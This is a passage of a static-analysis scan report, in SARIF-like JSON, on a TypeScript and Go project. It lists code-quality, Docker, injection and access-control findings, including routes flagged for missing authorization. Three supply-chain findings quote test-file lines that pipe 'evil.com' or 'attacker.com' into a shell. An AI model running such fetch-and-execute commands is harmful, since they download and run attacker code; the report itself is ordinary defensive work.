"placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/branch-lifecycle.test.ts"}, "region": {"startLine": 34}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22092, "scanner": "repobility", "fingerprint": "372a493355e25e78d3ea7f163d8ad19a", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/branch-lifecycle.test.ts"}, "region": {"startLine": 32}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder 
default username (admin/admin)"}, "properties": {"repobilityId": 22091, "scanner": "repobility", "fingerprint": "7416699ca848b89882b442ff6f8a5f60", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/handoff-lifecycle.test.ts"}, "region": {"startLine": 50}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22090, "scanner": "repobility", "fingerprint": "d17f106f6e68896e1d6c47ed31f2e2ed", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/handoff-lifecycle.test.ts"}, "region": {"startLine": 36}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22089, "scanner": "repobility", "fingerprint": "465554096f842ae363dbcb00d103f5dd", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/handoff-lifecycle.test.ts"}, "region": {"startLine": 34}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, 
"properties": {"repobilityId": 22088, "scanner": "repobility", "fingerprint": "f4ebea909e4da1db5b11fffde7bcf957", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/sync-edge-cases.test.ts"}, "region": {"startLine": 40}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22087, "scanner": "repobility", "fingerprint": "0fc11385ea2b94255fbbc6839f2e76f9", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/worktree-monitor.test.ts"}, "region": {"startLine": 63}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22086, "scanner": "repobility", "fingerprint": "ad2927399db7bb5964660991a562c57d", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/git-state-manager.test.ts"}, "region": {"startLine": 52}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22085, 
"scanner": "repobility", "fingerprint": "926b36c8517507d45bc162eb5c7009be", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/RelationshipManager.test.ts"}, "region": {"startLine": 654}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22084, "scanner": "repobility", "fingerprint": "81c579f48ba2d8b28cfb95890b8a3d8f", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/branch-manager.test.ts"}, "region": {"startLine": 62}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22083, "scanner": "repobility", "fingerprint": "8ec9d23d6cb39c783c815b57c103cee4", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/handoff-manager.test.ts"}, "region": {"startLine": 107}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22082, "scanner": "repobility", "fingerprint": 
"d525a699fc58adc1b6b1d5196df14aaf", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/user-manager-edge.test.ts"}, "region": {"startLine": 195}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22081, "scanner": "repobility", "fingerprint": "cb92c44524d36dd988b2cf80160278ba", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/user-manager-edge.test.ts"}, "region": {"startLine": 184}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22080, "scanner": "repobility", "fingerprint": "58995d88970bad57fd6da0c1204b5fc3", "category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/branch-wiring.test.ts"}, "region": {"startLine": 81}}}]}, {"ruleId": "QUAL004", "level": "note", "message": {"text": "Placeholder default username (admin/admin)"}, "properties": {"repobilityId": 22079, "scanner": "repobility", "fingerprint": "35a2a19dccd6870c4d82ed9ab492aa58", 
"category": "quality", "severity": "low", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "test@test.", "aljefra_cwe": ["CWE-1392", "CWE-798"], "aljefra_owasp": null, "aljefra_pattern_slug": "placeholder-default-username"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/handoff-wiring.test.ts"}, "region": {"startLine": 46}}}]}, {"ruleId": "WEB005", "level": "note", "message": {"text": "robots.txt does not advertise a sitemap"}, "properties": {"repobilityId": 10615, "scanner": "repobility-web-presence", "fingerprint": "55ac3b628a8dff92dc50ddc10564f7d852de5445c6778ff7e89cdbf3a4fed6bd", "category": "quality", "severity": "low", "confidence": 0.74, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Discovered robots file or route lacks a Sitemap directive.", "evidence": {"rule_id": "WEB005", "scanner": "repobility-web-presence", "references": ["https://www.rfc-editor.org/rfc/rfc9309", "https://www.sitemaps.org/protocol.html"], "correlation_key": "fp|55ac3b628a8dff92dc50ddc10564f7d852de5445c6778ff7e89cdbf3a4fed6bd"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "CLAUDE.md"}, "region": {"startLine": 1}}}]}, {"ruleId": "DKR008", "level": "note", "message": {"text": ".dockerignore misses sensitive defaults"}, "properties": {"repobilityId": 10578, "scanner": "repobility-docker", "fingerprint": "aea2ad92c68c4ee1f8432bb1ec25e7d45ac12c9e1790ac2d3fffe638b1acce12", "category": "docker", "severity": "low", "confidence": 0.72, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "A Docker build context should exclude secrets and repository metadata.", "evidence": {"rule_id": "DKR008", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/"], "correlation_key": "fp|aea2ad92c68c4ee1f8432bb1ec25e7d45ac12c9e1790ac2d3fffe638b1acce12", 
"missing_patterns": [".env", "id_rsa", "*.pem", "*.key"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".dockerignore"}, "region": {"startLine": 1}}}]}, {"ruleId": "SEC006", "level": "note", "message": {"text": "[SEC006] XSS Risk: Direct HTML injection without sanitization."}, "properties": {"repobilityId": 10576, "scanner": "repobility-threat-engine", "fingerprint": "544e2f1a3b92add814b9f2ae577e069759cf5ba8f35a439acd1b50eac4832525", "category": "injection", "severity": "low", "confidence": 0.4, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "No user-input source (request/query/fetch/URL) found \u2014 may be static content", "evidence": {"match": "document.write(h", "reason": "No user-input source (request/query/fetch/URL) found \u2014 may be static content", "rule_id": "SEC006", "scanner": "repobility-threat-engine", "confidence": 0.4, "correlation_key": "code|injection|token|263|sec006"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/publishing/PrivateViewer.ts"}, "region": {"startLine": 263}}}]}, {"ruleId": "ERR003", "level": "note", "message": {"text": "[ERR003] Ignored Error (Go): Ignoring error return values."}, "properties": {"repobilityId": 10568, "scanner": "repobility-threat-engine", "fingerprint": "d30eb854cc776f7de36e981e5f0d4cc9a7b4ec7661ffc5639f5cf15ac5100098", "category": "error_handling", "severity": "low", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "_ = filepath.Walk(", "reason": "Pattern matched with no mitigating context found", "rule_id": "ERR003", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|d30eb854cc776f7de36e981e5f0d4cc9a7b4ec7661ffc5639f5cf15ac5100098"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/attachments-sync/main.go"}, "region": {"startLine": 206}}}]}, 
{"ruleId": "ERR002", "level": "none", "message": {"text": "[ERR002] Empty Catch Block (and 7 more): Same pattern found in 7 additional files. Review if needed."}, "properties": {"repobilityId": 10575, "scanner": "repobility-threat-engine", "fingerprint": "5c81d47da75c572182ad0e4e4629636dbf842fd65f2c830612248897d6fb397f", "category": "error_handling", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 7 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 7 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "ERR002", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|5c81d47da75c572182ad0e4e4629636dbf842fd65f2c830612248897d6fb397f"}}}, {"ruleId": "ERR001", "level": "none", "message": {"text": "[ERR001] Silent Exception Swallowing (and 6 more): Same pattern found in 6 additional files. Review if needed."}, "properties": {"repobilityId": 10567, "scanner": "repobility-threat-engine", "fingerprint": "09a342afadf11f998ff72aae4f6dc6fdfc3a7a53fdd52d6a06632d6970e31c19", "category": "error_handling", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 6 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 6 additional occurrences found. 
The top occurrences remain visible as actionable findings.", "rule_id": "ERR001", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|09a342afadf11f998ff72aae4f6dc6fdfc3a7a53fdd52d6a06632d6970e31c19"}}}, {"ruleId": "SEC015", "level": "none", "message": {"text": "[SEC015] Insecure Randomness for Security (and 29 more): Same pattern found in 29 additional files. Review if needed."}, "properties": {"repobilityId": 10563, "scanner": "repobility-threat-engine", "fingerprint": "7495c2fb16713fb1d62abdca83107c4ccb1f228bd591294d25c2badfea8bbdb4", "category": "crypto", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 29 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 29 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|7495c2fb16713fb1d62abdca83107c4ccb1f228bd591294d25c2badfea8bbdb4"}}}, {"ruleId": "SEC015", "level": "none", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. 
Output is predictable."}, "properties": {"repobilityId": 10562, "scanner": "repobility-threat-engine", "fingerprint": "bfe05c9caa67b9f18daec0702c1c189042cff850608e2c9562a428f38f1b4aba", "category": "crypto", "severity": "info", "confidence": 0.25, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "evidence": {"match": "Math.random()", "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 0.25, "correlation_key": "code|crypto|token|678|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/EvolutionManager.ts"}, "region": {"startLine": 678}}}]}, {"ruleId": "SEC015", "level": "none", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. 
Output is predictable."}, "properties": {"repobilityId": 10561, "scanner": "repobility-threat-engine", "fingerprint": "0d16dc09cb612974cad9070a2a2a53ccf0c1c233942ad2913a38ba0faa1b7ab8", "category": "crypto", "severity": "info", "confidence": 0.25, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "evidence": {"match": "Math.random()", "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 0.25, "correlation_key": "code|crypto|src/core/dispatchmanager.ts|626|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/core/DispatchManager.ts"}, "region": {"startLine": 626}}}]}, {"ruleId": "SEC015", "level": "none", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. 
Output is predictable."}, "properties": {"repobilityId": 10560, "scanner": "repobility-threat-engine", "fingerprint": "43a294bcc907fb99e7e8b9c16cbe345c45e88c23cbe459519e4fed5882f6a04d", "category": "crypto", "severity": "info", "confidence": 0.25, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "evidence": {"match": "Math.random()", "reason": "Weak PRNG appears to be used for non-security behavior (UI, sampling, demos, shuffling, or backoff), not for secrets", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 0.25, "correlation_key": "code|crypto|src/cli.ts|89|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/cli.ts"}, "region": {"startLine": 89}}}]}, {"ruleId": "SEC020", "level": "none", "message": {"text": "[SEC020] Secret Printed to Logs (and 30 more): Same pattern found in 30 additional files. Review if needed."}, "properties": {"repobilityId": 10559, "scanner": "repobility-threat-engine", "fingerprint": "1486964fddabc4dbe0eca3ff5dab800d43de27623c4b1f0a4623d09e0bc356ac", "category": "credential_exposure", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 30 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 30 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|1486964fddabc4dbe0eca3ff5dab800d43de27623c4b1f0a4623d09e0bc356ac"}}}, {"ruleId": "SEC020", "level": "none", "message": {"text": "[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. 
This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for troubleshooting."}, "properties": {"repobilityId": 10558, "scanner": "repobility-threat-engine", "fingerprint": "0a42d00955cde6406370689e4c21d1647c919e951e361d544f6c067afbc7dd70", "category": "credential_exposure", "severity": "info", "confidence": 0.15, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Log line appears to mention secret metadata or a redacted value rather than printing the secret", "evidence": {"match": "console.error('worktree-precommit: WARN \u2014 missing INSTAR_SERVER_URL/INSTAR_AUTH_TOKEN; cannot enforc", "reason": "Log line appears to mention secret metadata or a redacted value rather than printing the secret", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.15, "correlation_key": "secret|token|10|console.error worktree-precommit: warn missing token cannot enforc"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/worktree-precommit-gate.js"}, "region": {"startLine": 105}}}]}, {"ruleId": "SEC020", "level": "none", "message": {"text": "[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. 
This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for troubleshooting."}, "properties": {"repobilityId": 10557, "scanner": "repobility-threat-engine", "fingerprint": "d167917618d349a03e5f20eaad4d2c2a99d1bc9bcdf47f10737af1cc31cc225e", "category": "credential_exposure", "severity": "info", "confidence": 0.15, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Log message mentions credential-related metadata but does not print a credential-bearing value", "evidence": {"match": "console.log('    SLACK_CONTRACT_BOT_TOKEN=<redacted> npm run test:contract\\n')", "reason": "Log message mentions credential-related metadata but does not print a credential-bearing value", "rule_id": "SEC020", "scanner": "repobility-threat-engine", "confidence": 0.15, "correlation_key": "secret|token|9|console.log slack_contract_bot_token redacted npm run test:contract n"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/check-contract-evidence.js"}, "region": {"startLine": 92}}}]}, {"ruleId": "SUPC001", "level": "error", "message": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "properties": {"repobilityId": 15556, "scanner": "repobility", "fingerprint": "7e3cc8408599e52bdfd6b973ec478dee", "category": "supply_chain", "severity": "high", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "curl http://evil.com/payload | sh", "aljefra_cwe": ["CWE-494"], "aljefra_owasp": "A08:2021", "aljefra_pattern_slug": "curl-pipe-bash"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/phase4-dispatch-scope-provenance.test.ts"}, "region": {"startLine": 176}}}]}, {"ruleId": "SUPC001", "level": "error", "message": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "properties": {"repobilityId": 15555, "scanner": "repobility", "fingerprint": "aaa0150fc2cb15d5b8c9808ce5ecbb09", "category": 
"supply_chain", "severity": "high", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "curl evil.com | bash", "aljefra_cwe": ["CWE-494"], "aljefra_owasp": "A08:2021", "aljefra_pattern_slug": "curl-pipe-bash"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/e2e/file-viewer-e2e.test.ts"}, "region": {"startLine": 497}}}]}, {"ruleId": "SUPC001", "level": "error", "message": {"text": "Supply chain \u2014 curl | bash anti-pattern"}, "properties": {"repobilityId": 15554, "scanner": "repobility", "fingerprint": "0843f8eee2289364901b375e0128d795", "category": "supply_chain", "severity": "high", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "curl attacker.com/exfil | bash", "aljefra_cwe": ["CWE-494"], "aljefra_owasp": "A08:2021", "aljefra_pattern_slug": "curl-pipe-bash"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/crash-recovery-ux.test.ts"}, "region": {"startLine": 483}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. 
Endpoint: POST /jobs/:slug/trigger."}, "properties": {"repobilityId": 10590, "scanner": "repobility-access-control", "fingerprint": "a8dc8ef58fa45122175ddca7653175d47aba6b7ccdcbac12d6c6c5471124e524", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/jobs/:slug/trigger", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|4541|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 4541}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. 
Endpoint: GET /context/:segmentId."}, "properties": {"repobilityId": 10589, "scanner": "repobility-access-control", "fingerprint": "00b751d6746b28e21b0a9409c1cb599bc27c6a2509bf65b71231a5056f5cb755", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/context/:segmentId", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|3684|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 3684}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. 
Endpoint: GET /memory/evidence/by-entity/:id."}, "properties": {"repobilityId": 10588, "scanner": "repobility-access-control", "fingerprint": "473f04521f301aef447e910f29e4f7904c26b1da098620c0d417a3e74a886766", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/memory/evidence/by-entity/:id", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2610|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2610}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. 
Endpoint: POST /semantic/verify/:id."}, "properties": {"repobilityId": 10587, "scanner": "repobility-access-control", "fingerprint": "be7c6c9986351cea6bb7b052f4793df9c5b2906ae880d0c6aacd49117bada53e", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/semantic/verify/:id", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2486|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2486}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. 
Endpoint: GET /semantic/explore/:id."}, "properties": {"repobilityId": 10586, "scanner": "repobility-access-control", "fingerprint": "4379d4b089c3e8a9aa7274f437fe43f4793b78ae224bc367bf8ec1d948f16bee", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/semantic/explore/:id", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2474|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2474}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. 
Endpoint: DELETE /semantic/forget/:id."}, "properties": {"repobilityId": 10585, "scanner": "repobility-access-control", "fingerprint": "9b4ff2b1a0c8ee171a1c32e39cffe6fe1c6f28dbd6c2a8f1b10ea8647c0b5427", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/semantic/forget/:id", "method": "DELETE", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2403|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2403}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. 
Endpoint: GET /semantic/recall/:id."}, "properties": {"repobilityId": 10584, "scanner": "repobility-access-control", "fingerprint": "bb8184a9b8c8af2a54d9b172ff9dd737328c4956e5057de7d9ef629ced4fd3f4", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/semantic/recall/:id", "method": "GET", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2392|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2392}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. 
Endpoint: POST /backups/:id/restore."}, "properties": {"repobilityId": 10583, "scanner": "repobility-access-control", "fingerprint": "a56616bc8c6b0e394e911a52a2599856e08f37d82fdd370d66d5c1a61fd0f028", "category": "auth", "severity": "high", "confidence": 0.7, "triageState": "open", "verdict": "needs_review", "isResolved": false, "reason": "Static route and framework evidence require project-owner confirmation.", "evidence": {"path": "/backups/:id/restore", "method": "POST", "scanner": "repobility-access-control", "framework": "Express", "correlation_key": "code|auth|src/server/routes.ts|2157|cwe-639", "identity_targets": ["unknown", "owner"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/server/routes.ts"}, "region": {"startLine": 2157}}}]}, {"ruleId": "AUC003", "level": "error", "message": {"text": "[AUC003] Object-level route lacks visible authorization: A route with an object id-like parameter does not show nearby authentication or authorization evidence. This is a BOLA/IDOR review target. 
